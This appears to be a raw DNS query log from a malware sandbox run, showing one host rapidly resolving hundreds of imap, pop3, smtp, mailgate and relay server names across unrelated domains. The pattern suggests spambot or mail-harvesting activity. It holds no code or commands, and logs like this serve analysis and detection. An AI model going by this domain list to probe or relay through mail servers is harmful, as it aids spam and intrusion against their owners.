Dec 22, 2023 21:15:06.871514082 CET	192.168.2.4	1.1.1.1	0xe848	Standard query (0)	imap.9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.872623920 CET	192.168.2.4	1.1.1.1	0x8137	Standard query (0)	imap.cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.872713089 CET	192.168.2.4	1.1.1.1	0xdf5	Standard query (0)	mail.nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.894628048 CET	192.168.2.4	1.1.1.1	0xdb35	Standard query (0)	mailgate.chemcaregroup.compg	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.911746025 CET	192.168.2.4	1.1.1.1	0xffe7	Standard query (0)	imap.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.912043095 CET	192.168.2.4	1.1.1.1	0xcdf9	Standard query (0)	mailgate.piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.913389921 CET	192.168.2.4	1.1.1.1	0xc055	Standard query (0)	imap.taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.938307047 CET	192.168.2.4	1.1.1.1	0x520a	Standard query (0)	imap.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.942235947 CET	192.168.2.4	1.1.1.1	0xbda1	Standard query (0)	imap.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.974559069 CET	192.168.2.4	1.1.1.1	0x2d8e	Standard query (0)	imap.dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.974605083 CET	192.168.2.4	1.1.1.1	0xbf26	Standard query (0)	pop3.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.974605083 CET	192.168.2.4	1.1.1.1	0x1a16	Standard query (0)	pop3.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.974632025 CET	192.168.2.4	1.1.1.1	0x4f3e	Standard query (0)	mailgate.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.020541906 CET	192.168.2.4	1.1.1.1	0x30b6	Standard query (0)	imap.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.026870966 CET	192.168.2.4	1.1.1.1	0xaef	Standard query (0)	pop3.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.026870966 CET	192.168.2.4	1.1.1.1	0x985d	Standard query (0)	imap.dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.026917934 CET	192.168.2.4	1.1.1.1	0x9f9b	Standard query (0)	mail.mobileuser.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.026983023 CET	192.168.2.4	1.1.1.1	0x914c	Standard query (0)	imap.263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.031342030 CET	192.168.2.4	1.1.1.1	0xdf5	Standard query (0)	mail.nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.031342030 CET	192.168.2.4	1.1.1.1	0x74b1	Standard query (0)	imap.asdfhjlasdfhjlk1.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.031352043 CET	192.168.2.4	1.1.1.1	0x6104	Standard query (0)	imap.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.031424046 CET	192.168.2.4	1.1.1.1	0x6fc9	Standard query (0)	smtp.gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.031465054 CET	192.168.2.4	1.1.1.1	0x6fe4	Standard query (0)	imap.154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.031508923 CET	192.168.2.4	1.1.1.1	0xe848	Standard query (0)	imap.9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.035451889 CET	192.168.2.4	1.1.1.1	0x7756	Standard query (0)	imap.aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.232305050 CET	192.168.2.4	1.1.1.1	0xcdf9	Standard query (0)	mailgate.piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.232369900 CET	192.168.2.4	1.1.1.1	0x520a	Standard query (0)	imap.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.232369900 CET	192.168.2.4	1.1.1.1	0x7756	Standard query (0)	imap.aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.232767105 CET	192.168.2.4	1.1.1.1	0xb50b	Standard query (0)	relay.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.347850084 CET	192.168.2.4	1.1.1.1	0x66b6	Standard query (0)	mailgate.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.349020004 CET	192.168.2.4	1.1.1.1	0xf104	Standard query (0)	smtp.154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.349287033 CET	192.168.2.4	1.1.1.1	0xcec4	Standard query (0)	mailgate.mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.349535942 CET	192.168.2.4	1.1.1.1	0x5723	Standard query (0)	mailgate.nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.350343943 CET	192.168.2.4	1.1.1.1	0x755b	Standard query (0)	mailgate.gpa.orgau	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.473987103 CET	192.168.2.4	1.1.1.1	0x862f	Standard query (0)	mailgate.dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.704417944 CET	192.168.2.4	1.1.1.1	0xaba3	Standard query (0)	mailgate.mercor.compl	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.704626083 CET	192.168.2.4	1.1.1.1	0x4ee5	Standard query (0)	mailgate.154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.704819918 CET	192.168.2.4	1.1.1.1	0x9d42	Standard query (0)	mailgate.arbsdecq.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.706767082 CET	192.168.2.4	1.1.1.1	0x66b6	Standard query (0)	mailgate.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.708456993 CET	192.168.2.4	1.1.1.1	0x25ef	Standard query (0)	mailgate.cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.710124969 CET	192.168.2.4	1.1.1.1	0x1950	Standard query (0)	mailgate.aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.745311022 CET	192.168.2.4	1.1.1.1	0xf7ea	Standard query (0)	mailgate.9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.749934912 CET	192.168.2.4	1.1.1.1	0xb919	Standard query (0)	mailgate.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.750412941 CET	192.168.2.4	1.1.1.1	0x9c4c	Standard query (0)	mailgate.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.751094103 CET	192.168.2.4	1.1.1.1	0x869d	Standard query (0)	imap.nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.751400948 CET	192.168.2.4	1.1.1.1	0xb2f8	Standard query (0)	mailgate.dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.751983881 CET	192.168.2.4	1.1.1.1	0xb05c	Standard query (0)	caribbean360-com.p40.spamhero.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.752291918 CET	192.168.2.4	1.1.1.1	0x6e68	Standard query (0)	mailgate.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.752594948 CET	192.168.2.4	1.1.1.1	0x6cd1	Standard query (0)	mailgate.pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.753309965 CET	192.168.2.4	1.1.1.1	0xc43	Standard query (0)	mailgate.263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.753531933 CET	192.168.2.4	1.1.1.1	0xe538	Standard query (0)	mailgate.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.754043102 CET	192.168.2.4	1.1.1.1	0xe233	Standard query (0)	mailgate.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.755711079 CET	192.168.2.4	1.1.1.1	0x9a9c	Standard query (0)	imap.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.764087915 CET	192.168.2.4	1.1.1.1	0x6a9e	Standard query (0)	imap.nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.764422894 CET	192.168.2.4	1.1.1.1	0x496d	Standard query (0)	mailgate.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.764780998 CET	192.168.2.4	1.1.1.1	0x7f28	Standard query (0)	mailgate.hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.765208960 CET	192.168.2.4	1.1.1.1	0x701	Standard query (0)	mailgate.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.765208960 CET	192.168.2.4	1.1.1.1	0x34bb	Standard query (0)	mailgate.djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.766865969 CET	192.168.2.4	1.1.1.1	0x46c7	Standard query (0)	mailgate.rio-perfume.orgua	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.767232895 CET	192.168.2.4	1.1.1.1	0x9387	Standard query (0)	relay.harrell-associates.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.767580986 CET	192.168.2.4	1.1.1.1	0xb39	Standard query (0)	imap.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.767925978 CET	192.168.2.4	1.1.1.1	0x3b0e	Standard query (0)	mailgate.souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.768557072 CET	192.168.2.4	1.1.1.1	0xf06c	Standard query (0)	mail.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.769870043 CET	192.168.2.4	1.1.1.1	0xe955	Standard query (0)	mailgate.studnets.ocps.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.769870043 CET	192.168.2.4	1.1.1.1	0x4dd4	Standard query (0)	mailgate.taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.770097017 CET	192.168.2.4	1.1.1.1	0x4bf4	Standard query (0)	mailgate.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.780287981 CET	192.168.2.4	1.1.1.1	0x343	Standard query (0)	mailgate.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.808604956 CET	192.168.2.4	1.1.1.1	0xe32d	Standard query (0)	relay.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.818880081 CET	192.168.2.4	1.1.1.1	0x37f0	Standard query (0)	mailgate.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.822278023 CET	192.168.2.4	1.1.1.1	0x1284	Standard query (0)	mailgate.vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.823354959 CET	192.168.2.4	1.1.1.1	0xf14c	Standard query (0)	mailgate.asdfhjlasdfhjlk1.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.823647022 CET	192.168.2.4	1.1.1.1	0xd5c9	Standard query (0)	mailgate.jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.870863914 CET	192.168.2.4	1.1.1.1	0x6b80	Standard query (0)	mailgate.bilfinger.comqa	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.161593914 CET	192.168.2.4	1.1.1.1	0x9c4c	Standard query (0)	mailgate.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.161672115 CET	192.168.2.4	1.1.1.1	0xf7ea	Standard query (0)	mailgate.9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.161709070 CET	192.168.2.4	1.1.1.1	0x9a9c	Standard query (0)	imap.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.161709070 CET	192.168.2.4	1.1.1.1	0xb919	Standard query (0)	mailgate.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.161746979 CET	192.168.2.4	1.1.1.1	0x6e68	Standard query (0)	mailgate.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.161746979 CET	192.168.2.4	1.1.1.1	0x869d	Standard query (0)	imap.nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.161782026 CET	192.168.2.4	1.1.1.1	0xe233	Standard query (0)	mailgate.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.161782026 CET	192.168.2.4	1.1.1.1	0x6cd1	Standard query (0)	mailgate.pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.161822081 CET	192.168.2.4	1.1.1.1	0x7f28	Standard query (0)	mailgate.hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.161822081 CET	192.168.2.4	1.1.1.1	0x496d	Standard query (0)	mailgate.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.161854029 CET	192.168.2.4	1.1.1.1	0x9387	Standard query (0)	relay.harrell-associates.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.161854029 CET	192.168.2.4	1.1.1.1	0x6a9e	Standard query (0)	imap.nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.161959887 CET	192.168.2.4	1.1.1.1	0x4bf4	Standard query (0)	mailgate.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.161959887 CET	192.168.2.4	1.1.1.1	0x701	Standard query (0)	mailgate.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.161995888 CET	192.168.2.4	1.1.1.1	0xf06c	Standard query (0)	mail.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.162023067 CET	192.168.2.4	1.1.1.1	0x343	Standard query (0)	mailgate.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.162045956 CET	192.168.2.4	1.1.1.1	0xe32d	Standard query (0)	relay.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.162045956 CET	192.168.2.4	1.1.1.1	0x37f0	Standard query (0)	mailgate.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.162075043 CET	192.168.2.4	1.1.1.1	0x1284	Standard query (0)	mailgate.vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.162089109 CET	192.168.2.4	1.1.1.1	0xd5c9	Standard query (0)	mailgate.jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.162118912 CET	192.168.2.4	1.1.1.1	0xf14c	Standard query (0)	mailgate.asdfhjlasdfhjlk1.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.162118912 CET	192.168.2.4	1.1.1.1	0x6b80	Standard query (0)	mailgate.bilfinger.comqa	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.170804024 CET	192.168.2.4	1.1.1.1	0x6d73	Standard query (0)	smtp.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.171303034 CET	192.168.2.4	1.1.1.1	0x72df	Standard query (0)	relay.e-manage.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.174237013 CET	192.168.2.4	1.1.1.1	0x9f0f	Standard query (0)	relay.djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.174987078 CET	192.168.2.4	1.1.1.1	0xe670	Standard query (0)	imap.pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.176184893 CET	192.168.2.4	1.1.1.1	0x973d	Standard query (0)	mailstore1.secureserver.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.231511116 CET	192.168.2.4	1.1.1.1	0x2f26	Standard query (0)	imap.rio-perfume.orgua	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.231923103 CET	192.168.2.4	1.1.1.1	0x16a2	Standard query (0)	imap.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.232358932 CET	192.168.2.4	1.1.1.1	0xa715	Standard query (0)	imap.jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.233011961 CET	192.168.2.4	1.1.1.1	0xdaa8	Standard query (0)	mailgate.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.233498096 CET	192.168.2.4	1.1.1.1	0xba0c	Standard query (0)	imap.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.235152006 CET	192.168.2.4	1.1.1.1	0x1eba	Standard query (0)	mailgate.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.237715960 CET	192.168.2.4	1.1.1.1	0x618c	Standard query (0)	mailgate.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.240936995 CET	192.168.2.4	1.1.1.1	0x7bdf	Standard query (0)	imap.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.240936995 CET	192.168.2.4	1.1.1.1	0xec7e	Standard query (0)	mailgate.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.244321108 CET	192.168.2.4	1.1.1.1	0xaa68	Standard query (0)	mailgate.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.284271002 CET	192.168.2.4	1.1.1.1	0xaa1e	Standard query (0)	mailgate.hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.287442923 CET	192.168.2.4	1.1.1.1	0xacc0	Standard query (0)	mailgate.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.689944983 CET	192.168.2.4	1.1.1.1	0xec7e	Standard query (0)	mailgate.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.689944983 CET	192.168.2.4	1.1.1.1	0xa715	Standard query (0)	imap.jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.690066099 CET	192.168.2.4	1.1.1.1	0x7bdf	Standard query (0)	imap.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.690110922 CET	192.168.2.4	1.1.1.1	0xaa68	Standard query (0)	mailgate.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.690110922 CET	192.168.2.4	1.1.1.1	0x618c	Standard query (0)	mailgate.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.690161943 CET	192.168.2.4	1.1.1.1	0xaa1e	Standard query (0)	mailgate.hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.690161943 CET	192.168.2.4	1.1.1.1	0xacc0	Standard query (0)	mailgate.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.768068075 CET	192.168.2.4	1.1.1.1	0x3876	Standard query (0)	relay.gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.770303965 CET	192.168.2.4	1.1.1.1	0xa2c7	Standard query (0)	mailgate.hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.771245003 CET	192.168.2.4	1.1.1.1	0xc594	Standard query (0)	mailgate.freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:08.953433037 CET	192.168.2.4	1.1.1.1	0xc594	Standard query (0)	mailgate.freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:09.045130014 CET	192.168.2.4	1.1.1.1	0xa3b9	Standard query (0)	mailgate.nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:09.140305996 CET	192.168.2.4	1.1.1.1	0xfec1	Standard query (0)	relay.chemcaregroup.compg	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:09.260191917 CET	192.168.2.4	1.1.1.1	0x330c	Standard query (0)	relay.acaiforcemaxweightloss.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:09.285043001 CET	192.168.2.4	1.1.1.1	0x8505	Standard query (0)	pop3.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:09.287558079 CET	192.168.2.4	1.1.1.1	0x8fc9	Standard query (0)	relay.piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:09.489773035 CET	192.168.2.4	1.1.1.1	0x8505	Standard query (0)	pop3.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:09.530035019 CET	192.168.2.4	1.1.1.1	0xc4ab	Standard query (0)	mail.williamcroy.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:09.974584103 CET	192.168.2.4	1.1.1.1	0xd31d	Standard query (0)	relay.dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:09.989905119 CET	192.168.2.4	1.1.1.1	0x8e41	Standard query (0)	relay.gpa.orgau	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.083245039 CET	192.168.2.4	1.1.1.1	0x2d59	Standard query (0)	relay.nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.153739929 CET	192.168.2.4	1.1.1.1	0xa096	Standard query (0)	relay.mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.155246019 CET	192.168.2.4	1.1.1.1	0xfd61	Standard query (0)	smtp.freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.171242952 CET	192.168.2.4	1.1.1.1	0x60a6	Standard query (0)	derrickandbriggs-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.179244995 CET	192.168.2.4	1.1.1.1	0x7afb	Standard query (0)	relay.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.240748882 CET	192.168.2.4	1.1.1.1	0x72b8	Standard query (0)	ftp.sunbeltfinancial.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.251245022 CET	192.168.2.4	1.1.1.1	0xd7c1	Standard query (0)	ftp.jiashi.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.251245022 CET	192.168.2.4	1.1.1.1	0x5f3f	Standard query (0)	relay.aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.251399040 CET	192.168.2.4	1.1.1.1	0xba14	Standard query (0)	relay.154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.251739025 CET	192.168.2.4	1.1.1.1	0x511f	Standard query (0)	relay.mercor.compl	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.254431963 CET	192.168.2.4	1.1.1.1	0xcba7	Standard query (0)	relay.arbsdecq.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.254431963 CET	192.168.2.4	1.1.1.1	0x5e19	Standard query (0)	relay.cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.260413885 CET	192.168.2.4	1.1.1.1	0xb049	Standard query (0)	relay.studnets.ocps.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.260766983 CET	192.168.2.4	1.1.1.1	0x8158	Standard query (0)	relay.taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.261199951 CET	192.168.2.4	1.1.1.1	0x530e	Standard query (0)	relay.souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.262737989 CET	192.168.2.4	1.1.1.1	0x2efd	Standard query (0)	mail.pmcsystem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.262737989 CET	192.168.2.4	1.1.1.1	0x716	Standard query (0)	relay.rio-perfume.orgua	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.262737989 CET	192.168.2.4	1.1.1.1	0xf511	Standard query (0)	ftp.pmcsystem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.287060976 CET	192.168.2.4	1.1.1.1	0x730	Standard query (0)	relay.djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.308212042 CET	192.168.2.4	1.1.1.1	0x5077	Standard query (0)	relay.263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.311247110 CET	192.168.2.4	1.1.1.1	0x18c3	Standard query (0)	relay.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.326159954 CET	192.168.2.4	1.1.1.1	0x200f	Standard query (0)	relay.dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.326159954 CET	192.168.2.4	1.1.1.1	0x7afb	Standard query (0)	relay.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.326159954 CET	192.168.2.4	1.1.1.1	0x60a6	Standard query (0)	derrickandbriggs-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.327889919 CET	192.168.2.4	1.1.1.1	0x5806	Standard query (0)	relay.asdfhjlasdfhjlk1.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.328190088 CET	192.168.2.4	1.1.1.1	0x1167	Standard query (0)	relay.vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.328535080 CET	192.168.2.4	1.1.1.1	0xca6d	Standard query (0)	relay.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.328716993 CET	192.168.2.4	1.1.1.1	0xcde2	Standard query (0)	relay.9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.330064058 CET	192.168.2.4	1.1.1.1	0xeb37	Standard query (0)	relay.jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.330064058 CET	192.168.2.4	1.1.1.1	0x6e81	Standard query (0)	relay.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.330460072 CET	192.168.2.4	1.1.1.1	0x997b	Standard query (0)	relay.bilfinger.comqa	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.331247091 CET	192.168.2.4	1.1.1.1	0x7aeb	Standard query (0)	relay.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.331247091 CET	192.168.2.4	1.1.1.1	0xabe2	Standard query (0)	relay.hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.331566095 CET	192.168.2.4	1.1.1.1	0x76bc	Standard query (0)	relay.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.338896036 CET	192.168.2.4	1.1.1.1	0xc745	Standard query (0)	relay.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.347949982 CET	192.168.2.4	1.1.1.1	0x5ef7	Standard query (0)	relay.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.348596096 CET	192.168.2.4	1.1.1.1	0x33d3	Standard query (0)	relay.pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.358505011 CET	192.168.2.4	1.1.1.1	0x3fab	Standard query (0)	relay.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.358505011 CET	192.168.2.4	1.1.1.1	0xccf1	Standard query (0)	relay.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.359226942 CET	192.168.2.4	1.1.1.1	0x8fba	Standard query (0)	mx.jk.locaweb.com.br	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.359226942 CET	192.168.2.4	1.1.1.1	0xc4f	Standard query (0)	aero4.stememail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.421185970 CET	192.168.2.4	1.1.1.1	0xd7c1	Standard query (0)	ftp.jiashi.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.421185970 CET	192.168.2.4	1.1.1.1	0x530e	Standard query (0)	relay.souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.421185970 CET	192.168.2.4	1.1.1.1	0xf511	Standard query (0)	ftp.pmcsystem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.514230967 CET	192.168.2.4	1.1.1.1	0x19a2	Standard query (0)	relay.mobile.baihe.com	A (IP address)	IN (0x0001)	false
